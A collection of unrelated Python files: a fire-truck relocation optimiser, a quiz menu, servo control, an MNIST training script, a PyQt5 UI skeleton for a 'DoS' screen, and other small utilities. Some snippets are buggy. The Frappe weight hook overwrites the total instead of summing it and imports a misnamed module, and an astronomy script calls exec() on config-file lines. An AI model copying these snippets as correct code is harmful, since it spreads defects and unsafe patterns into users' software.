'ZEBRA': '13780194'
}
STATION_AREA_TO_NAME = {value: key for key, value in STATION_NAME_TO_AREA.items()}
STATION_NAMES = ['AALSMEER', 'AMSTELVEEN', 'ANTON', 'DIEMEN', 'DIRK', 'DRIEMOND',
'DUIVENDRECHT', 'HENDRIK', 'IJSBRAND', 'NICO', 'OSDORP', 'PIETER',
'TEUNIS', 'UITHOORN', 'VICTOR', 'WILLEM', 'ZEBRA']
NUM_STATIONS = len(STATION_NAMES)
STATION_NAME_TO_ACTION = {STATION_NAMES[i]: i for i in range(len(STATION_NAMES))}
def save_station_areas(save_path='./data/updated_kazerne_set.msg'):
"""Save the set of areas in which there is a fire station.
Parameters
----------
save_path: str
The path to save the msgpack file.
"""
new_kazerne_set = list(STATION_NAME_TO_AREA.values())
with open(save_path, 'wb') as f:
msgpack.pack(new_kazerne_set, f)
return new_kazerne_set
def create_new_rates_dict(incidents, kvt_path, station_mapping=STATION_NAME_TO_AREA, vehicle_type='TS',
loc_col='hub_vak_bk', save=False, save_path='./data/updated_rates_dict.msg'):
"""Calculate the overall incident rates per service area and return / save them in the format
required by the MCRP Agent.
Parameters
----------
incidents: pd.DataFrame
The incident data. Must be filtered to all relevant cases (e.g., incidents with a deployment
of the vehicle type of interest or with high priority); all we do here is count
the number of incidents in each service area.
kvt_path: str
Path to the KVT data.
station_mapping: dict
Like {'STATION_NAME' -> 'area_code'}. Must contain all relevant stations.
vehicle_type: str, one of ['TS', 'HV', 'RV', 'WO']
The vehicle type to consider.
"""
service_areas = create_service_area_dict(kvt_path, station_filter=list(station_mapping.keys()))
rates = {}
for s, locs in service_areas[vehicle_type].items():
rates[STATION_NAME_TO_AREA[s]] = int(np.sum(np.in1d(incidents[loc_col].values, locs)))
if save:
with open(save_path, 'wb') as f:
msgpack.pack(rates, f)
return rates
def create_new_travel_time_input(path, areas, in_minutes=True, save=False, save_path='./data/updated_traveltimes.pickle'):
"""Create a matrix of travel / relocation times between the areas that have
a fire station.
Parameters
----------
path: str
The path to the full time matrix.
areas: list(str)
The area codes in which there is a station.
in_minutes: bool, default=True
If True, reports travel time in minutes, otherwise in seconds.
save: bool, default=True
Whether to save the resulting matrix at save_path.
save_path: str, default='./data/updated_traveltimes.pickle'
The path to save the result as a pickle.
Returns
-------
travel_matrix: pd.DataFrame
Matrix of shape [len(areas), len(areas)], with the travel times.
"""
time_matrix = pd.read_csv(path, index_col='index', dtype={'index': str})
travel_times = time_matrix.loc[areas, areas]
if in_minutes:
travel_times = np.round(travel_times / 60, 1)
if save:
pickle.dump(travel_times, open(save_path, 'wb'))
return travel_times
def build_rn(vaks, disp_order, kazerne_set, size):
"""Construct response neighborhoods (RNs) for a given RN size (number of fire stations).
Parameters
----------
vaks: array
The demand location IDs.
disp_order: pd.DataFrame
With columns 'vak', 'kazerne', and 'order', specifying the order of priority
in which an area ('vak') is served by the fire stations.
kazerne_set: list
The set of demand locations in which a station is positioned.
size: int
The size of the Response Neighborhood.
"""
cols = np.concatenate((['vak_nr'], ['kazerne_' + s for s in map(str, np.arange(1, size + 1))]))
# find 'size' closest stations for each square, order them alphabatically
rn_sets = pd.DataFrame(columns = cols)
for vak in vaks:
rn = disp_order[disp_order.vak == vak].sort_values(by=['order'])['kazerne'][0:size]
rn.sort_values()
rn = pd.DataFrame([tuple(np.concatenate(([vak],rn)))], columns = cols)
rn_sets = rn_sets.append(rn, ignore_index=True)
# leave only unique combinations of the 'size' closest stations, create id for each unique RN
rn_set = rn_sets[['kazerne_' + s for s in map(str, np.arange(1, size + 1))]].drop_duplicates()
rn_set['rn_id'] = pd.Series(range(len(rn_set['kazerne_1'])), index=rn_set.index)
# construct the incidence matrix
A = np.zeros((len(kazerne_set), rn_set.shape[0]))
for i in rn_set.index:
for j in range(len(kazerne_set)):
if (kazerne_set[j] in list(rn_set.loc[i][0:size])):
A[j, rn_set.loc[i][size]] = 1
return A
def construct_rn_matrices(traveltimes, kazerne_set, save=False, save_path='./data/rn_matrices.pickle'):
"""Construct the Response Neighborhoods matrices.
Parameters
----------
traveltimes: pd.DataFrame
The travel times between every set of demand locations.
kazerne_set: list
The set of demand locations in which a station is positioned.
Returns
-------
matrices: list of np.arrays
The matrices for response neighborhoods of size 1, 2, ..., len(kazerne_set).
"""
traveltimes_station = traveltimes[kazerne_set]
vaks = list(traveltimes.index.values)
N = len(kazerne_set)
disp_order = pd.DataFrame(columns=['vak', 'kazerne', 'order'])
service_areas = []
for index, row in traveltimes_station.iterrows():
disp_order = disp_order.append(pd.DataFrame(
{'vak': [index for x in range(N)],
'kazerne': list(row.sort_values().index.values),
'order': range(N)}
)
)
service_areas.append([index, list(row.sort_values().index.values)[0]])
# Construct RN's of different sizes
Incidence = []
for size in range(1, N + 1):
print('size: ', size)
A = build_rn(vaks, disp_order, kazerne_set, size)
Incidence.append(A)
if save:
pickle.dump(Incidence, open(save_path, 'wb'))
return Incidence
def extract_vehicles_from_state(state):
return state[:NUM_STATIONS]
def extract_current_destination_area(state):
return STATION_NAME_TO_AREA[
STATION_NAMES[np.flatnonzero(state[NUM_STATIONS:(2 * NUM_STATIONS)])[0]]
]
def area_to_action(area):
if area is None:
return NUM_STATIONS
else:
return STATION_NAME_TO_ACTION[STATION_AREA_TO_NAME[area]]
class MCRPAgent():
"""Agent based on _Fire Truck Relocation During Major Incidents_ (Usanov et al., 2019)."""
def __init__(self, W=1, trucks_per_rn=1, kazerne_path='./data/updated_kazerne_set.msg', regions_path='./data/Incidence.p',
travel_times_path='./data/updated_traveltimes.pickle', rates_path='./data/updated_rates_dict.msg'):
"""Load required data and save parameters."""
# load data
with open(kazerne_path, "rb") as f:
self.kazerne_set = msgpack.unpackb(f.read(), raw = False)
self.incidence = pickle.load(open(regions_path, "rb"))
self.traveltimes_fs = pickle.load(open(travel_times_path, "rb"))
with open(rates_path, "rb") as f:
self.rates_dict = msgpack.unpackb(f.read(), raw=False)
# parameters for willingness to relocate (W) and
# minimum number of trucks per response neighborhood
self.W = W
self.trucks_per_rn = trucks_per_rn
def evaluate(self, env_cls, n_episodes=10000, tmax=None, env_params=None):
"""Evaluate the agent on an environemt without training.
Parameters
----------
env_cls: uninitialized Python class or str
The environment to train on. If a class is provided, it must be uninitialized.
Parameters can be passed to the environment using env_params. If a string
is provided, this string is fed to `gym.make()` to create the environment.
n_episodes: int, optional, default=10,000
The number of episodes to run.
tmax: int, optional, default=None
The maximum number of steps to run in each episode. If None, set to 10,000 to
not enforce a limit in most environments.
env_params: dict, optional, default=None
Dictionary of parameter values to pass to `env_cls` upon initialization.
"""
if tmax is None:
self.tmax = 10000
else:
self.tmax = tmax
self.env = make_env(env_cls, env_params)
self.action_shape, self.n_actions, self.obs_shape, _ = \
obtain_env_information(env_cls, env_params)
self.episode_counter = 0
self.step_counter = 0
self.done = True
self.eval_results = {
"total_episode_reward": np.zeros(n_episodes),
"mean_episode_reward": np.zeros(n_episodes),
"episode_length": np.zeros(n_episodes),
}
seen_states = {}
for ep in range(n_episodes):
self.state = np.asarray(self.env.reset(), dtype=np.int16)
self.episode_step_counter = 0
self.episode_reward = 0
for i in range(self.tmax):
# get relocations from dictionary if problem was solved before
# otherwise solve it and save the results for next time
try:
relocations = seen_states[tuple(extract_vehicles_from_state(self.state))]
except KeyError:
relocations = self.get_relocations(self.state)
seen_states[tuple(extract_vehicles_from_state(self.state))] = relocations
# get origin if current destination is in the relocations
to_from = {d['to']: d['from'] for d in relocations.values()}
destination_area = extract_current_destination_area(self.state)
origin_area = to_from[destination_area] if destination_area in list(to_from.keys()) else None
# select and perform action
self.action = area_to_action(origin_area)
new_state, self.reward, self.done, _ = self.env.step(self.action)
# bookkeeping
self.step_counter += 1
self.episode_reward += self.reward
self.episode_step_counter += 1
self.state = np.asarray(copy.copy(new_state), dtype=np.int16)
# end of episode
if self.done:
break
self.eval_results["total_episode_reward"][ep] = self.episode_reward
self.eval_results["mean_episode_reward"][ep] = self.episode_reward / self.episode_step_counter
self.eval_results["episode_length"][ep] = self.episode_step_counter
progress("Completed episode {}/{}".format(ep + 1, n_episodes),
same_line=(ep > 0), newline_end=(ep + 1 == n_episodes))
return self.eval_results
def _state_to_fleet_dict(self, state):
"""Translate an array of vehicles per station to the fleet dict required
for the MCRP algorithm.
"""
vehicles = extract_vehicles_from_state(state)
return {STATION_NAME_TO_AREA[STATION_NAMES[i]]: [vehicles[i], vehicles[i]]
for i in range(len(vehicles))}
def get_relocations(self, state):
"""Get the relocations for a given vehicles availability.
Assumes all vehicles in `vehicles` are available for relocation.
Parameters
----------
state: array-like, 1D
The number of vehicles available at the stations, in the order
of STATION_NAMES, plus further observations.
Returns
-------
fleet: dict
The fleet dictionary like {'area code' -> [x, x]}, where
x is the number of available vehicles according to the
provided array.
"""
fleet = self._state_to_fleet_dict(state)
return self._get_relocations_from_fleet(fleet)
def _get_relocations_from_fleet(self, fleet_dict):
"""Get the relocations suggested by the MCRP-LBAP solution for a given fleet."""
for s in range(1, len(self.kazerne_set)):
A = self.incidence[s - 1]
opt_model, relocations, fleet_after = self._solve_mcrp(A, fleet_dict)
if opt_model.status == 1:
movements = self._solve_lbap(relocations)
return movements
return {}
def _solve_mcrp(self, A, fleet_dict):
"""Solve the Maximum Coverage Relocation Problem."""
# arrival rates per service area
rates = [self.rates_dict[x] for x in self.kazerne_set]
# available fleet per station
#fleet = [fleet_dict[x][0] for x in kazerne_set];
fleet = [fleet_dict[x][0] for x in self.kazerne_set];
# available for relocation
active = [fleet_dict[x][1] for x in self.kazerne_set];
## Sets used for iteration over fire satations (kazerne)
## and response neighborhoods (rn)
kazerne_range = range(len(self.kazerne_set))
rn_set = range(A.shape[1])
## Sets of station ID's
# empty stations
empty_id = [x for x in kazerne_range if fleet[x] == 0]
# stations with only one truck
single_id = [x for x in kazerne_range if fleet[x] == 1]
# stations with more than one truck
many_id = [x for x in kazerne_range if fleet[x] > 1]
## Model
# create 'opt_model' variable that contains problem data
opt_model = pulp.LpProblem("MCRP", pulp.LpMaximize)
## VARIABLES: if relocation is made from station i to station j
relocate = {(i, j):
pulp.LpVariable(cat='Binary',
name="relocate_{0}_{1}".format(i,j))
for i in kazerne_range for j in kazerne_range}
## VARIABLES: fleet after relocations are made
fleet_after = {i:
pulp.LpVariable(cat='Integer',
name="fleet_after_{0}".format(i))
for i in kazerne_range}
## VARIABLES: indicates if the station is unoccupied
unoccupied = {i:
pulp.LpVariable(cat='Binary',
name="unoccupied_{0}".format(i))
for i in many_id}
## OBJECTIVE
objective = pulp.lpSum((self.W*(rates[j] - rates[i]) + (self.W - 1))*relocate[(i, j)] for i in single_id for j in empty_id) \
+ pulp.lpSum((self.W*rates[j] + (self.W - 1))*relocate[(i, j)] for i in many_id for j in empty_id) \
+ pulp.lpSum(-self.W*rates[i]*unoccupied[i] for i in many_id)
# Constraint 1. Every RN should be covered by trucks_per_rn trucks
constraints_1 = {r:
pulp.LpConstraint(
e=pulp.lpSum(A[j][r]*fleet_after[j] for j in kazerne_range),
sense=pulp.LpConstraintGE,
rhs=self.trucks_per_rn,
name="constr_rn_{0}".format(r))
for r in rn_set}
# Constraint 2. Trucks flow control
constraints_2 = {i:
pulp.LpConstraint(
e= fleet_after[i] - pulp.lpSum(relocate[(j, i)] for j in kazerne_range) + pulp.lpSum(relocate[(i, j)] for j in kazerne_range),
sense=pulp.LpConstraintEQ,
rhs=fleet[i],
name="constr_move_{0}".format(i))
for i in kazerne_range}
# Constraint 3. Do not relocate more than available
constraints_3 = {i:
pulp.LpConstraint(
e=pulp.lpSum(relocate[(i, j)] for j in kazerne_range),
sense=pulp.LpConstraintLE,
rhs=active[i],
name="constr_reloc_avail_{0}".format(i))
for i in kazerne_range}
# Constraints 4. Fleet should be positive
constraints_4 = {i:
pulp.LpConstraint(
e=fleet_after[i],
sense=pulp.LpConstraintGE,
rhs=0,
name="constr_pos_fleet_{0}".format(i))
for i in kazerne_range}
# Constraint 5. Do not relocate more than 1 truck to the same empty station
constraints_5 = {i:
pulp.LpConstraint(
e=pulp.lpSum(relocate[(j, i)] for j in kazerne_range),
sense=pulp.LpConstraintLE,
rhs=1,
name="constr_single_truck_{0}".format(i))
for i in empty_id}
# Constraint 6. Do not relocate to full stations
constraints_6 = {(i, j):
pulp.LpConstraint(
e=relocate[(i, j)],
sense=pulp.LpConstraintEQ,
rhs=0,
name="constr_not_to_full_{0}_{1}".format(i, j))
for i in kazerne_range for j in kazerne_range if j not in empty_id}
# Constraint 7. Unoccupied consistency
constraints_7 = {i:
pulp.LpConstraint(
e=fleet_after[i]+unoccupied[i],
sense=pulp.LpConstraintGE,
rhs=1,
name="constr_unoccpd_consistency_{0}".format(i))
for i in many_id}
# add constraints to the model
for r in rn_set:
opt_model += constraints_1[r]
for i in kazerne_range:
opt_model += constraints_2[i]
opt_model += constraints_3[i]
opt_model += constraints_4[i]
for j in [x for x in kazerne_range if x not in empty_id]:
opt_model += constraints_6[(i, j)]
for i in empty_id:
opt_model += constraints_5[i]
for i in many_id:
opt_model += constraints_7[i]
# add objective to the model
opt_model += objective
# solve the model
opt_model.solve()
# output solution
try:
relocate_m = [[int(relocate[(i, j)].varValue) for j in kazerne_range] for i in kazerne_range]
fleet_after_m = [int(fleet_after[i].varValue) for i in kazerne_range]
except:
relocate_m = relocate,
fleet_after_m = fleet_after
return opt_model, relocate_m, fleet_after_m
def _solve_lbap(self, relocations):
"""Assign origin stations to destination stations by solving the
Linear Bottleneck Assignment Problem.
"""
# make the set of origins
# and the set of destinations
origins_list = [[x for y in range(len(relocations[x])) if relocations[x][y] > 0] for x in range(len(relocations))]
origins = [item for sublist in origins_list for item in sublist]
#origins = [x for x in range(len(kazerne_set)) if sum(relocations[x]) > 0]
destinations_list = [[y for y in range(len(relocations[x])) if relocations[x][y] > 0] for x in range(len(relocations))]
destinations = [item for sublist in destinations_list for item in sublist]
#destinations = [x for x in range(len(kazerne_set)) if sum([row[x] for row in relocations]) > 0]
# set of origins' indeces
origin_set = range(len(origins))
# set of destinations' indeces
destination_set = range(len(destinations))
## Model
# create 'opt_model' variable that contains problem data
opt_model = pulp.LpProblem("LBAP", pulp.LpMinimize)
# Relocation decision variables:
relocate = {(i, j):
pulp.LpVariable(cat='Binary',
name="relocate_{0}_{1}".format(i,j))
for i in origin_set for j in destination_set}
# Dummy decision variable - maximum travelling time
maxtime = {0:
pulp.LpVariable(cat='Continuous',
name="dummy_max")}
# Dummy decision variable - total travelling time of all except the maximum
totaltime = {0:
pulp.LpVariable(cat='Continuous',
name="dummy_total")}
## OBJECTIVE
# The objective is to minimize the maximum travelling time and then the total travelling time
objective = 1000*maxtime[0]+totaltime[0]
# Constraint 1. Every travel time should be less than the maximum travel time
constraints_1 = {(i, j):
pulp.LpConstraint(
e=self.traveltimes_fs.iloc[[origins[i]], [destinations[j]]].values[0][0]*relocate[(i, j)]-maxtime[0],
sense=pulp.LpConstraintLE,
rhs=0,
name="max_time_{0}_{1}".format(i, j))
for i in origin_set for j in destination_set}
# Constraint 2. Use each origin exactly once
constraints_2 = {i:
pulp.LpConstraint(
e=pulp.lpSum(relocate[(i, j)] for j in destination_set),
sense=pulp.LpConstraintEQ,
rhs=1,
name="reloc_or_{0}".format(i))
for i in origin_set}
# Constraint 3. Use each destination exactly once
constraints_3 = {i:
pulp.LpConstraint(
e=pulp.lpSum(relocate[(j, i)] for j in origin_set),
sense=pulp.LpConstraintEQ,
rhs=1,
name="reloc_dest_{0}".format(i))
for i in destination_set}
# Constraint 4. Definition of the totaltime dummy variable
constraints_4 = {0:
pulp.LpConstraint(
e=pulp.lpSum(self.traveltimes_fs.iloc[[origins[i]], [destinations[j]]].values[0][0]*relocate[(i, j)] for i in origin_set for j in destination_set)-totaltime[0],
sense=pulp.LpConstraintEQ,
rhs=0,
name="total_time")
}
# add objective to the model
opt_model += objective
# add constraints to the model
for i in origin_set:
opt_model += constraints_2[i]
for j in destination_set:
opt_model += constraints_1[(i, j)]
for i in destination_set:
opt_model += constraints_3[i]
opt_model += constraints_4[0]
# solve the model
opt_model.solve()
# output solution
try:
relocate_m = {}
indx = 1
for i in origin_set:
for j in destination_set:
if relocate[(i, j)].varValue > 0:
relocate_m[indx] = {'from': self.kazerne_set[origins[i]], 'to': self.kazerne_set[destinations[j]]}
indx += 1
except:
relocate_m = relocate
return relocate_m
|
from time import sleep
from interface.menus import *
pysolvers = ['\033[34mGabriel Correia (gothmate)',
'Pablo Narciso',
'Antonio (Tonny)',
'Eduardo Gonçalves',
'Ricardo Garcêz\033[m',
]
cabecalho('QUIZ PySolvers 2.0')
print('''\033[33mBem vindo ao Quiz Game.
Meu nome é Py15-A e vou te acompanhar nesse processo.
Você tem 3 chances! Não as desperdice.\033[m''')
while True:
sleep(1)
menuPrinc('ESCOLHA UMA OPÇÃO')
sleep(1)
opc = int(input('Escolha: '))
if opc == 1:
pergunta()
elif opc == 2:
while True:
menuOpc('OPÇÕES')
opc = int(input('Escolha uma opção: '))
if opc == 1:
print('Opção Som')
sleep(3)
elif opc == 2:
cabecalho('EQUIPE PySolvers')
for i in pysolvers:
print(f'{i}'.center(60))
sleep(3)
sleep(3)
else:
break
elif opc == 3:
print('\033[31mSaindo do jogo. Até a próxima...\033[m')
break
|
"""servos offers an interface for controlling motors that has been attached to an Arduino.
"""
import multiprocessing
import numpy as np
import logging
import time
import pyfirmata
class Servo(object):
# safety delay after changing the servos angle in case no particular number has been
# defined by the user
_safety_delay = 0.0005
# how many seconds it takes until pyFirmata and Arduino have been synchronized
_synchronization_time = 3
def __init__(
self,
pin: int,
port: str = "/dev/ttyACM0",
start_angle: float = 0,
allowed_range_of_angles: tuple = (0, 180),
# how long it takes to move 60 degree, depending on the particular servo motor
# model that get used
operating_speed: float = 0.11,
# how many degree does the motor approximately move with each step
move_to_grid_size: float = 0.1,
):
self._allowed_range_of_angles = allowed_range_of_angles
self._board = pyfirmata.Arduino(port)
self._pin = pin
self._operating_speed = operating_speed
self._operating_speed_per_degree = self._operating_speed / 60
self._move_to_grid_size = move_to_grid_size
# Set mode of the pin n as SERVO
self._board.digital[pin].mode = pyfirmata.SERVO
logging.info("synchronizing pyFirmata and Arduiono...")
# Need to give some time to pyFirmata and Arduino to synchronize
time.sleep(self._synchronization_time)
self._last_position = multiprocessing.Value("f", start_angle)
# move to start angle
self._set_angle(start_angle)
@property
def board(self) -> pyfirmata.Arduino:
return self._board
@property
def pin(self) -> int:
return self._pin
@property
def last_position(self) -> float:
return self._last_position.value
@last_position.setter
def last_position(self, value: float) -> None:
self._last_position.value = value
@property
def operating_speed(self) -> float:
return self._operating_speed
def _is_angle_in_allowed_range(self, angle: float) -> None:
try:
tests = (
angle >= self._allowed_range_of_angles[0],
angle <= self._allowed_range_of_angles[1],
)
assert all(tests)
except AssertionError:
msg = "Angle has to be in between {} and not {}!".format(
self._allowed_range_of_angles, angle
)
raise ValueError(msg)
def _set_angle(self, angle: float, sleep_duration: float = None) -> None:
if not sleep_duration:
sleep_duration = self._safety_delay
# check if angle is in allowed range
self._is_angle_in_allowed_range(angle)
self.board.digital[self.pin].write(angle)
self.last_position = angle
time.sleep(sleep_duration)
def move_to(self, angle: float, duration: float) -> None:
if angle != self.last_position:
degree2move = angle - self.last_position
estimated_duration = abs(degree2move * self._operating_speed_per_degree)
if estimated_duration > duration:
msg = "Servo motor is too slow to reach angle '{}' in '{}' ".format(
angle, duration
)
msg += "seconds from angle '{}'. Estimated duration is '{}'.".format(
self.last_position, estimated_duration
)
logging.warning(msg)
self._set_angle(angle)
elif estimated_duration == duration:
self._set_angle(angle)
else:
step_size = degree2move / round(degree2move / self._move_to_grid_size)
n_steps = abs(int(degree2move / step_size))
step_duration = duration / n_steps
for angle in np.linspace(
self.last_position, angle, n_steps, dtype=float
):
self._set_angle(angle, step_duration)
|
import csv
import random
man = list(range(100,150,1))
woman = list(range(200,250,1))
with open('kekka.csv', 'w') as f:
for M in man:
for F in woman:
f.write(str(M) + "," + str(F) + "," + str(random.randint(1,1000)) + "\n")
|
import time
import traceback
import multiprocessing
from functions.plot_manager import setup_backend_for_saving
from functions.process_functions import find_homographies_per_thread
from objects.constants import Constants
from objects.homography import Homography
from objects.images import TemplateImage, TestImage
from objects.plot_discarded import PlotDiscarded
from objects.ratio import RatioList
class ProcessHandler(multiprocessing.Process):
def __init__(self, test_image: TestImage, template: TemplateImage, return_dict, ratio_list, plot_dict):
super().__init__()
self.test_image: TestImage = test_image
self.template: TemplateImage = template
self.homographies: [Homography] = []
# ratio list condiviso fra i processi
self.ratio_list = RatioList(self.test_image.image)
# ratio list single process
# self.ratio_list = RatioList(test_image.image)
self.return_dict = return_dict
self.plot_dict = plot_dict
self.plots: [PlotDiscarded] = []
def run(self):
try:
self.plot_dict[self.template.name] = []
self.return_dict[self.template.name] = []
tic = time.time()
find_homographies_per_thread(self.template, self.test_image, self.ratio_list,
self.homographies, self.plots)
toc = time.time()
t = round(toc - tic, 2)
print("{} -> found: {}, discarded: {}, time: {}".format(self.template.name, len(self.homographies),
len(self.plots), t))
self.plot_dict[self.template.name] = self.plots
self.return_dict[self.template.name] = self.homographies
except:
traceback.print_exc()
|
t = int(input())
while t > 0:
import math
n,k = map(int,input().split())
arr = []
for i in range(k+1,n+1,+1):
arr.append(i)
x = math.ceil(k/2)
for i in range(x,k,+1):
arr.append(i)
print(len(arr))
print(*arr,sep=" ")
t = t-1
|
def calculate_total_weight(doc,method):
from frappe.util import flt
total_net_weight = 0.0
for x in doc.items:
x.weight = flt(x.weight_per_unit) * flt(x.qty)
total_net_weight = x.weight
doc.total_net_weight = total_net_weight
|
#!/usr/bin/env /data/mta/Script/Python3.8/envs/ska3-shiny/bin/python
#############################################################################
# #
# author: t. isobe (tisobe@cfa.harvard.edu) #
# #
# last update: May 20, 2019 #
# #
#############################################################################
import os
import sys
import re
import string
import random
import math
import sqlite3
import unittest
import time
import numpy
import astropy.io.fits as pyfits
import Chandra.Time
#
#--- reading directory list
#
path = '/data/mta/Script/MTA_limit_trends/Scripts3.83.6/house_keeping/dir_list'
with open(path, 'r') as f:
data = [line.strip() for line in f.readlines()]
for ent in data:
atemp = re.split(':', ent)
var = atemp[1].strip()
line = atemp[0].strip()
exec("%s = %s" %(var, line))
#
#--- append path to a private folder
#
sys.path.append(mta_dir)
sys.path.append(bin_dir)
#
import mta_common_functions as mcf #---- mta common functions
import envelope_common_function as ecf #---- collection of functions used in envelope fitting
import find_moving_average as fma #---- moving average
import find_moving_average_bk as fmab #---- moving average (backword fitting version)
#
#--- set a temporary file name
#
rtail = int(time.time() * random.random())
zspace = '/tmp/zspace' + str(rtail)
#-----------------------------------------------------------------------------------
#-----------------------------------------------------------------------------------
#-----------------------------------------------------------------------------------
def find_range(msid_list):
mfile = house_keeping + msid_list
data = mcf.read_data_file(mfile)
sline = ''
for ent in data:
atemp = re.split('\s+', ent)
msid = atemp[0]
mc = re.search('#', msid)
if mc is not None:
continue
group = atemp[1]
fits = data_dir + group + '/' + msid + '_data.fits'
try:
f = pyfits.open(fits)
fdata = f[1].data
f.close()
except:
continue
vals = fdata[msid]
blim = numpy.percentile(vals, 1)
tlim = numpy.percentile(vals, 99)
if blim == tlim:
vmin = blim
vmax = tlim
blim = min(vals)
tlim = max(vals)
if blim == tlim:
vmin = blim
vmax = tlim
else:
selc = [(vals > blim) & (vals < tlim)]
svals = vals[selc]
if len(svals) > 0:
vmin = min(svals)
vmax = max(svals)
else:
vmin = min(vals)
vmax = max(vals)
if vmin == vmax:
vmin -= 1
vmax += 1
if len(msid) < 8:
msid = msid + '\t'
if len(group)< 8:
tgroup = group + '\t'
else:
tgroup = group
if abs(vmin) > 10:
line = msid + '\t' + tgroup + '\t' + '%3.1f' % (round(vmin, 1)) + '\t'
line = line + '%3.1f' % (round(vmax, 1)) + '\t0.011\n'
elif abs(vmin) > 1:
line = msid + '\t' + tgroup + '\t' + '%3.2f' % (round(vmin, 2)) + '\t'
line = line + '%3.2f' % (round(vmax, 2)) + '\t0.011\n'
else:
line = msid + '\t' + tgroup + '\t' + '%2.4f' % (round(vmin, 4)) + '\t'
line = line + '%2.4f' % (round(vmax, 4)) + '\t0.011\n'
sline = sline + line
with open('out', 'w') as fo:
fo.write(line)
fo.close()
#--------------------------------------------------------------------------------------
if __name__ == '__main__':
msid_list = sys.argv[1]
find_range(msid_list)
|
#coding: utf-8
#1.import packages
import torch
import torchvision
from torch import nn, optim
from torch.autograd import Variable
from torch.utils.data import DataLoader
from torchvision import datasets
#2.Def Hyperparameters
batch_size = 100
learning_rate = 0.05
num_epoches = 50
#3.import MNIST
data_tf = torchvision.transforms.Compose( #pretreat the data
[
torchvision.transforms.ToTensor(), #(0 ,1)
torchvision.transforms.Normalize([0.5],[0.5]) #(-1,1)
]
)
data_path = r'C:\Users\ssunki\Anaconda3\MNIST' #import the dataset
train_dataset = datasets.MNIST(data_path, train=True, transform=data_tf, download=False)
test_dataset = datasets.MNIST(data_path, train=False, transform=data_tf, download=False)
train_loader = DataLoader(train_dataset, batch_size=batch_size, shuffle=True,num_workers=0) #import iteration data
test_loader = DataLoader(test_dataset, batch_size=batch_size, shuffle=False,num_workers=0)
#4.Def net Model
class Emm(nn.Module):
def __init__(self): #dim,classify
super(Emm, self).__init__() # Cnn inherit nn.Module
self.conv = nn.Sequential(
nn.Conv2d(1, 16, 3,2,1), #parameters:in_dim,out_dim,ksize,stride,padding)
nn.BatchNorm2d(16),
nn.ReLU(True),
nn.Conv2d(16, 32, 3,2,1),
nn.BatchNorm2d(32),
nn.ReLU(True),
nn.Conv2d(32, 64, 3,2,1),
nn.BatchNorm2d(64),
nn.ReLU(True),
nn.Conv2d(64, 64, 2,2,0),
nn.BatchNorm2d(64),
nn.ReLU(True))
self.fc = nn.Sequential(
nn.Linear(64*2*2, 100),
nn.Linear(100, 10))
def forward(self, x): # forward
out = self.conv(x)
out = out.view(out.size(0), -1)
out = self.fc(out)
return out
model = Emm()
print(model)
model = model.cuda()
# 5.Def loss func and optimizer
criterion = nn.CrossEntropyLoss()
optimizer = optim.SGD(model.parameters(), lr=learning_rate)
# 6.train
for epoch in range(num_epoches):
print('epoch {}'.format(epoch + 1))
running_loss = 0.0 #initialize loss & acc
running_acc = 0.0
for i, data in enumerate(train_loader, 1):
img, label = data
img = img.cuda()
label = label.cuda()
img = Variable(img) # transform tensor into variable
label = Variable(label)
# forward
out = model(img)
loss = criterion(out, label)
running_loss += loss.item() * label.size(0)
_, pred = torch.max(out, 1)
num_correct = (pred == label).sum()
accuracy = (pred == label).float().mean()
running_acc += num_correct.item()
# back forward
optimizer.zero_grad()
loss.backward()
optimizer.step()
print('Finish {} epoch, Loss: {:.6f}, Acc: {:.6f}'.format(
epoch + 1, running_loss / (len(train_dataset)), running_acc / (len(train_dataset))))
# 7.Def test_model
model.eval()
eval_loss = 0
eval_acc = 0
for data in test_loader:
img, label = data
# Wrap in variable
with torch.no_grad():
img = Variable(img).cuda()
label = Variable(label).cuda()
out = model(img)
loss = criterion(out, label)
eval_loss += loss.item() * label.size(0)
_, pred = torch.max(out, 1)
num_correct = (pred == label).sum()
eval_acc += num_correct.item()
# 8.Print loss & acc
print('Test Loss: {:.6f}, Acc: {:.6f}'.format(
eval_loss / (len(test_dataset)), eval_acc / (len(test_dataset))))
print()
'''
#print a image
print(train_dataset.train_dataset.size()) # (60000, 28)
print(train_dataset.train_labels.size()) # (60000)
plt.imshow(train_dataset.train_dataset[5].numpy(), cmap='gray')
plt.title('%i' % train_dataset.train_labels[5])
plt.show()
'''
import winsound #ring
winsound.Beep(32767,2000)
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'DoS.ui'
#
# Created by: PyQt5 UI code generator 5.14.1
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_Dos_MainWindow(object):
def setupUi(self, Dos_MainWindow):
Dos_MainWindow.setObjectName("Dos_MainWindow")
Dos_MainWindow.resize(471, 307)
self.centralwidget = QtWidgets.QWidget(Dos_MainWindow)
self.centralwidget.setObjectName("centralwidget")
self.label = QtWidgets.QLabel(self.centralwidget)
self.label.setGeometry(QtCore.QRect(120, 20, 201, 20))
self.label.setObjectName("label")
self.l_dos1 = QtWidgets.QLabel(self.centralwidget)
self.l_dos1.setGeometry(QtCore.QRect(90, 80, 47, 13))
self.l_dos1.setObjectName("l_dos1")
self.l_dos2 = QtWidgets.QLabel(self.centralwidget)
self.l_dos2.setGeometry(QtCore.QRect(90, 110, 47, 13))
self.l_dos2.setObjectName("l_dos2")
self.inputDoS = QtWidgets.QLineEdit(self.centralwidget)
self.inputDoS.setGeometry(QtCore.QRect(70, 180, 113, 20))
self.inputDoS.setObjectName("inputDoS")
self.btnDoSChoice = QtWidgets.QPushButton(self.centralwidget)
self.btnDoSChoice.setGeometry(QtCore.QRect(190, 180, 75, 23))
self.btnDoSChoice.setObjectName("btnDoSChoice")
self.btnDoSVoltar = QtWidgets.QPushButton(self.centralwidget)
self.btnDoSVoltar.setGeometry(QtCore.QRect(290, 180, 75, 23))
self.btnDoSVoltar.setObjectName("btnDoSVoltar")
self.l_defesa_dos = QtWidgets.QLabel(self.centralwidget)
self.l_defesa_dos.setGeometry(QtCore.QRect(120, 230, 291, 20))
self.l_defesa_dos.setText("")
self.l_defesa_dos.setObjectName("l_defesa_dos")
self.label_2 = QtWidgets.QLabel(self.centralwidget)
self.label_2.setGeometry(QtCore.QRect(70, 80, 47, 13))
self.label_2.setObjectName("label_2")
self.label_3 = QtWidgets.QLabel(self.centralwidget)
self.label_3.setGeometry(QtCore.QRect(70, 110, 47, 13))
self.label_3.setObjectName("label_3")
Dos_MainWindow.setCentralWidget(self.centralwidget)
self.menubar = QtWidgets.QMenuBar(Dos_MainWindow)
